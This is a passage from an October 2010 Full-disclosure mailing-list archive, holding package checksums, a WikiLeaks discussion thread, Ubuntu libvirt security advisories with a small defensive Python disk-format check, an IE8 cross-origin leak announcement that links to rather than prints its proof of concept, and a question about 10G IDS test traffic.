 9b77d3f7691759132cd83c143d545bbc  2009.0/x86_64/lib64purple0-2.7.4-0.1mdv2009.0.x86_64.rpm
 db9e939bd921d388aa28e3da5e1f1e74  2009.0/x86_64/lib64purple-devel-2.7.4-0.1mdv2009.0.x86_64.rpm
 f34250d75b0fd111c45ee8e3a7e066f2  2009.0/x86_64/pidgin-2.7.4-0.1mdv2009.0.x86_64.rpm
 d372c8bb109cb12708b9e02706879411  2009.0/x86_64/pidgin-bonjour-2.7.4-0.1mdv2009.0.x86_64.rpm
 cef6333cc6b7aedd8eb5d38a38925506  2009.0/x86_64/pidgin-client-2.7.4-0.1mdv2009.0.x86_64.rpm
 12fb53acdd919875a6ca23ee2a2e6fa4  2009.0/x86_64/pidgin-gevolution-2.7.4-0.1mdv2009.0.x86_64.rpm
 29077064095cc4fb8ef64bd06e7f495c  2009.0/x86_64/pidgin-i18n-2.7.4-0.1mdv2009.0.x86_64.rpm
 5d71995b91428993338169017a853e6f  2009.0/x86_64/pidgin-meanwhile-2.7.4-0.1mdv2009.0.x86_64.rpm
 cafd698ff2ccc9a0b1b63e3e4724ceba  2009.0/x86_64/pidgin-perl-2.7.4-0.1mdv2009.0.x86_64.rpm
 e4f1437744385900c5c3bb2f7a34e41e  2009.0/x86_64/pidgin-plugins-2.7.4-0.1mdv2009.0.x86_64.rpm
 4c88b13b9066c871e656d6c7b5de3749  2009.0/x86_64/pidgin-silc-2.7.4-0.1mdv2009.0.x86_64.rpm
 f1b7210f0909e75bb1ea6ab8dacb6474  2009.0/x86_64/pidgin-tcl-2.7.4-0.1mdv2009.0.x86_64.rpm
 bbfe063e27008c72e0a2f9793906f5e4  2009.0/SRPMS/pidgin-2.7.4-0.1mdv2009.0.src.rpm

 Mandriva Linux 2010.0:
 4a807e2430c8de3afef0fd8705c64756  2010.0/i586/finch-2.7.4-0.1mdv2010.0.i586.rpm
 37c9fa1be9da720ab2df2a23d05b2e45  2010.0/i586/libfinch0-2.7.4-0.1mdv2010.0.i586.rpm
 01b0d18fdd89e7e9d21e1efcb7ed25ef  2010.0/i586/libpurple0-2.7.4-0.1mdv2010.0.i586.rpm
 b09905fe21241e96782d31836aa569f6  2010.0/i586/libpurple-devel-2.7.4-0.1mdv2010.0.i586.rpm
 d567efd8c615daf2775c1ddce4564021  2010.0/i586/pidgin-2.7.4-0.1mdv2010.0.i586.rpm
 bf724f06c191e8650020fb6003f3faba  2010.0/i586/pidgin-bonjour-2.7.4-0.1mdv2010.0.i586.rpm
 461e35ca45634158c58272611e4ddacb  2010.0/i586/pidgin-client-2.7.4-0.1mdv2010.0.i586.rpm
 

[Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Harry Behrens
Sorry to all of those who think this is gossiping, but:

Wikileaks has been down for ca. 2 weeks now during which time the US has 
at least cut off their financial channels.
This during a period where WL has announced another major leak release 
this time re. Iraq.
What is also extremely disconcerting is the absolute silence of _all_ 
main street media to the topic (gag...?)

Now the latest tweet reads:
WikiLeaks communications infrastructure is currently under attack. 
Project BO move to coms channel S. Activate Reston5.

Yet again I would like to point out that there seems to be a concerted 
high power attack going on against WL.
And yet again I would like to point out it would be interesting to know 
what is really happening.
And yet again I'd like to emphasize that this is indeed a security issue; 
it does concern netizens and citizens in general if major government 
organisations engage in what seems to be a dirty war against a 
whistleblowing organisation.

If anybody knows more, pls. do share insights...

 Harry




Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Cal Leeming [Simplicity Media Ltd]
This will be my first and last post on this topic (again).

I've just finished watching some videos about what wikileaks have been
doing.

It appears that they released a bunch of documents that revealed information
such as GPS co-ords + details of those who co-op'd with soldiers. He also
posted the names of these people too, and a bunch of information which
could jeopardise the protection of soldiers on the ground, from all
countries.

I can appreciate his previous efforts, but what he has done here is put many
lives at risk, both civilians and soldiers.

So, if the US military have launched an all-out war on Wikileaks, whether it
be legal or not, I can't say it would be entirely shocking.



-- 

Cal Leeming

Operational Security & Support Team

Out of Hours: +44 (07534) 971120 | Support Tickets: supp...@simplicitymedialtd.co.uk
Fax: +44 (02476) 578987 | Email: cal.leem...@simplicitymedialtd.co.uk
IM: AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564

Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Jeffrey Walton
Hi Cal,

 I can appreciate his previous efforts, but what he has done here is put many
 lives at risk, both civilians and soldiers.
Agreed.

Just to play devil's advocate:
Would Barack Obama also be culpable? His campaign platform included a
withdrawal from Iraq (Afghanistan was a different story). So troops are
still there because he [apparently] lied to [fraudulently] obtain the
office.

If the troops weren't there, then the troops would not be at risk, and
there would be no WikiLeaks story. quod erat demonstrandum.

Jeffrey Walton
Baltimore, MD, US



Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Thor (Hammer of God)
Hey Cal - hope all is well...

Along those lines, I think it is also interesting to take into account how much 
similar information is being distributed by military personnel themselves on 
social sites like Facebook.  Thomas Ryan did an interesting Blackhat 
presentation on Robin Sage where a fake account was friended by multiple 
military people, who in turn were posting iPhone and other geo-tagged images on 
Facebook where their location was tagged and the associated names of others 
were available (I didn't actually get to attend, but I had prior knowledge of 
the content).

So while this type of stuff is great Conspiracy Theory fodder, I seriously 
doubt that there is some illegal military operation behind the attacks on 
Wikileaks.  If they had any additional information they wished to share, there 
are a million other ways of getting the data out there - we'd be seeing that 
stuff on Twitter instead of tech updates.  I think we'd also be seeing Facebook 
takedowns...

T

P.S.  I think I'm going to set up a social network for hookers and call it 
Twatter if anyone is interested in investing.




Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Harry Behrens
On 21.10.2010 18:54, T Biehn wrote:
 An entity that has the resources that would provoke such a Hollywood-esque 
 tweet wouldn't have the ability to gag the twitter account 
 before this release?

Would it, would it want to, has it missed it... who knows?

 Wouldn't that mean the tweet is a load of shit?


Wouldn't/shouldn't/couldn't...I just don't know.
Point is I'm trying to find out what's actually happening...

 -h



Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Roger
I believe that most of the time it is not what you defend but how you
defend it.
I believe in Government transparency but the way WL is going about it
is not right, in my honest opinion.
So this is good news in my opinion...

-r



Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Ana Kismet
I have seen nothing released that reveals sensitive information such as GPS
co-ords + details of those who co-op'd with soldiers.

This is a rumor. If you have proof that this is not a rumor, please post it.





Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Camden Buzard
According to the secretary of defense, it's definitely a rumor:

A letter from Secretary of Defense Robert M. Gates to
Committee of Armed Services Chairman Carl Levin dated August 16 but
recently made available to the public says, "The initial assessment in
no way discounts the risk to national security; however, the review to
date has not revealed any sensitive intelligence sources and methods
compromised by this disclosure."

http://mashable.com/2010/10/18/wikileaks-dod-intelligence/
direct pdf link:
http://www.fas.org/sgp/othergov/dod/gates-wikileaks.pdf

--Camden


Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Cal Leeming [Simplicity Media Ltd]
I apologise for this, I had heard this in, what I had believed to be, a
credible news report.





-- 

Cal Leeming

Operational Security & Support Team

Out of Hours: +44 (07534) 971120 | Support Tickets: supp...@simplicitymedialtd.co.uk
Fax: +44 (02476) 578987 | Email: cal.leem...@simplicitymedialtd.co.uk
IM: AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564

Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Charles Timko
Agreed. I am all for the transparency, but WL is possibly putting our troops
at risk by releasing military strategy.  I wouldn't expect JA to think that
there is any inclination of strategy in the documents they published, but
there is a lot of strategy and a LOT of information that is now visible to
more than just United States citizens.

-timko



Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Jonathan Medina
I am in the military, currently in Iraq, and these Wikileaks posts
have hurt us more than people realize. It does two things, first, it
demonstrates our tactics and procedures which allow insurgents to
conduct more effective attacks against us, and second, the information
it provides to insurgents endangers our sources and the families of
sources that have provided us with valuable information. It also
provides a means of giving insurgents propaganda to use against us.
Whether you agree with the war or not, the publication of these
documents hurts people who had no say in the decision to go to war.
Having said that, I absolutely do not support the illegal attacks and
denial of service to the site. Here is a link to a tech news article I
read today on the issue.

http://cybersecurityreport.nextgov.com/2010/10/wikileaks_communications_infrastructure_attacked.php?oref=latest_posts





Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread BMF
On Thu, Oct 21, 2010 at 11:32 AM, Charles Timko
charles.ti...@hotmail.com wrote:
 Agreed. I am all for the transparency, but WL is possibly putting our troops
 at risk by releasing military strategy.  I wouldn't expect JA to think that

From:

http://articles.cnn.com/2010-10-16/us/wikileaks.assessment_1_julian-assange-wikileaks-documents?_s=PM:US

"The online leak of thousands of secret military documents from
the war in Afghanistan by the website WikiLeaks
did not disclose any sensitive intelligence sources or methods,"
the Department of Defense concluded.

So some are playing it up but the top dude at the Pentagon is playing
it down. Who ya gonna believe? Unless someone can point to a verified
leaked document online which says "Mohammed Jihad Dirka Dirka who
lives at lat/long told us Osama is in that house over there" or some
such I can't believe such information is being distributed.

BMF



[Full-disclosure] [USN-1008-1] libvirt vulnerabilities

2010-10-21 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-1008-1   October 21, 2010
libvirt vulnerabilities
CVE-2010-2237, CVE-2010-2238, CVE-2010-2239, CVE-2010-2242
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  libvirt-bin  0.4.0-2ubuntu8.3
  libvirt0     0.4.0-2ubuntu8.3

Ubuntu 9.04:
  libvirt-bin  0.6.1-0ubuntu5.2
  libvirt0     0.6.1-0ubuntu5.2

Ubuntu 9.10:
  libvirt-bin  0.7.0-1ubuntu13.2
  libvirt0     0.7.0-1ubuntu13.2

Ubuntu 10.04 LTS:
  libvirt-bin  0.7.5-5ubuntu27.5
  libvirt0     0.7.5-5ubuntu27.5

After a standard system update you need to reboot your computer to make
all the necessary changes.

ATTENTION: The previous version of libvirt on Ubuntu 10.04 LTS would probe
a qemu disk to determine its format and did not require that the format be
declared in the XML. This is considered a security problem in most
deployments and this version of libvirt will default to the 'raw' format
when the format is not specified in the XML. As a result, non-raw disks
without a specified disk format will no longer be available in existing
virtual machines.

The libvirt-migrate-qemu-disks tool is provided to aid in transitioning
virtual machine definitions to the new required format. In essence, it will
check all domains for affected virtual machines, probe the affected disks
and update the domain definition accordingly. This command will be run
automatically on upgrade. For new virtual machines using non-raw images,
the disk format must be specified in the domain XML provided to libvirt,
otherwise the disk will not be available to the virtual machine. See man 1
libvirt-migrate-qemu-disks for details.

Users who require the old behavior can adjust the 'allow_disk_format_probing'
option in /etc/libvirt/qemu.conf.
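As an added example (not part of this advisory, of libvirt, or of the libvirt-migrate-qemu-disks tool), the following Python check lists file-backed disks in a domain definition whose format is undeclared, which the updated libvirt now treats as 'raw', and declares a format supplied by the operator. The domain XML, image paths and domain name are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample domain: 'vda' declares qcow2, 'vdb' declares nothing
# (libvirt now treats it as raw); the cdrom is an ISO and is raw anyway.
SAMPLE_DOMAIN_XML = """<domain type='kvm'>
  <name>test-import</name>
  <devices>
    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/var/lib/libvirt/images/vda.qcow2'/>
      <target dev='vda' bus='virtio'/>
    </disk>
    <disk type='file' device='disk'>
      <source file='/var/lib/libvirt/images/vdb.qcow2'/>
      <target dev='vdb' bus='virtio'/>
    </disk>
    <disk type='file' device='cdrom'>
      <source file='/var/lib/libvirt/images/install.iso'/>
      <target dev='hdc' bus='ide'/>
    </disk>
  </devices>
</domain>"""

def disks_without_format(domain_xml):
    """Source paths of file-backed hard disks lacking <driver type='...'/>."""
    root = ET.fromstring(domain_xml)
    missing = []
    for disk in root.findall("./devices/disk"):
        if disk.get("type") != "file" or disk.get("device") != "disk":
            continue
        driver = disk.find("driver")
        if driver is None or not driver.get("type"):
            missing.append(disk.find("source").get("file"))
    return missing

def declare_format(domain_xml, source_file, fmt):
    """Return the XML with <driver name='qemu' type=fmt/> set for one disk."""
    # 'fmt' must come from the operator or a probe run on the trusted host,
    # never from a header the guest can rewrite inside its own image.
    root = ET.fromstring(domain_xml)
    for disk in root.findall("./devices/disk"):
        src = disk.find("source")
        if src is not None and src.get("file") == source_file:
            driver = disk.find("driver")
            if driver is None:
                driver = ET.Element("driver")
                disk.insert(0, driver)
            driver.set("name", "qemu")
            driver.set("type", fmt)
    return ET.tostring(root, encoding="unicode")
```

Run the check against `virsh dumpxml` output for each domain before upgrading; any path it reports will be unavailable to the guest afterwards unless its format is declared.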

Details follow:

It was discovered that libvirt would probe disk backing stores without
consulting the defined format for the disk. A privileged attacker in the
guest could exploit this to read arbitrary files on the host. This issue
only affected Ubuntu 10.04 LTS. By default, guests are confined by an
AppArmor profile which provided partial protection against this flaw.
(CVE-2010-2237, CVE-2010-2238)

It was discovered that libvirt would create new VMs without setting a
backing store format. A privileged attacker in the guest could exploit this
to read arbitrary files on the host. This issue did not affect Ubuntu 8.04
LTS. In Ubuntu 9.10 and later guests are confined by an AppArmor profile
which provided partial protection against this flaw. (CVE-2010-2239)

Jeremy Nickurak discovered that libvirt created iptables rules with too
lenient mappings of source ports. A privileged attacker in the guest could
bypass intended restrictions to access privileged resources on the host.
(CVE-2010-2242)


Updated packages for Ubuntu 8.04 LTS:

[Full-disclosure] [USN-1008-2] Virtinst update

2010-10-21 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-1008-2   October 21, 2010
virtinst update
https://launchpad.net/bugs/655392
===

A security issue affects the following Ubuntu releases:

Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 10.04 LTS:
  virtinst                        0.500.1-2ubuntu6.1

In general, a standard system update will make all the necessary changes.

Details follow:

Libvirt in Ubuntu 10.04 LTS now no longer probes qemu disks for the image
format and defaults to 'raw' when the format is not specified in the XML.
This change in behavior breaks virt-install --import because virtinst in
Ubuntu 10.04 LTS did not allow for specifying a disk format and does not
specify a format in the XML. This update adds the 'format=' option when
specifying a disk. For example, to import an existing VM which uses a qcow2
disk format, use something like the following:

  virt-install --connect=qemu:///session --name test-import --ram=256 \
    --disk path=path to qcow2 image,format=qcow2 --import

For more information, see man 1 virt-install.

Original advisory details:

 It was discovered that libvirt would probe disk backing stores without
 consulting the defined format for the disk. A privileged attacker in the
 guest could exploit this to read arbitrary files on the host. This issue
 only affected Ubuntu 10.04 LTS. By default, guests are confined by an
 AppArmor profile which provided partial protection against this flaw.
 (CVE-2010-2237, CVE-2010-2238)
 
 It was discovered that libvirt would create new VMs without setting a
 backing store format. A privileged attacker in the guest could exploit this
 to read arbitrary files on the host. This issue did not affect Ubuntu 8.04
 LTS. In Ubuntu 9.10 and later guests are confined by an AppArmor profile
 which provided partial protection against this flaw. (CVE-2010-2239)
 
 Jeremy Nickurak discovered that libvirt created iptables rules with too
 lenient mappings of source ports. A privileged attacker in the guest could
 bypass intended restrictions to access privileged resources on the host.
 (CVE-2010-2242)


Updated packages for Ubuntu 10.04 LTS:

[Full-disclosure] Internet Explorer 8 PoC: window.onerror leak leads to surge in interest in goat farming?

2010-10-21 Thread Chris Evans
Hi,

Internet Explorer has a cross-origin leak through the window.onerror
callback.
At first glance, it's a minor leak but if you look around you can find a
significant impact on some subset of websites.

I wrote up more thorough details on how the attack works here:
http://scarybeastsecurity.blogspot.com/2010/10/minor-leak-major-headache.html

I also provided a PoC against Google Reader; the victim has their anti-XSRF
token stolen and this is used to force them to subscribe to a feed on goat
farming: http://scary.beasts.org/misc/reader.html

(Unfortunately -- or fortunately depending upon your point of view -- the PoC
is neutered because the Reader team elected to work around the IE
vulnerability for now).

The vulnerability remains unfixed in production versions of IE and is
approaching 2 years old since vendor notification. This would make this a
600-day disclosure. It would be inaccurate to use the term 0-day, although
misuse of that term is somewhat rampant.

Security-conscious users may wish to prefer the Firefox browser over
Internet Explorer; the timeline in the blog post shows two very different
vendor responses to the exact same cross-origin leak.


Cheers
Chris

[Full-disclosure] 10G virtual network traffic

2010-10-21 Thread 김무성
Hello list.

I'm making a virtual network which has 10G traffic for testing 10G IDS
performance.

I use a Breaking point device. http://www.breakingpointsystems.com/cyber-tomography-products/

Are there any tips or documents about making a 10G virtual network?

And which points are important?

How can I analyze it without knowing the real network traffic?

What are the different things? 1G network traffic vs. 10G network traffic
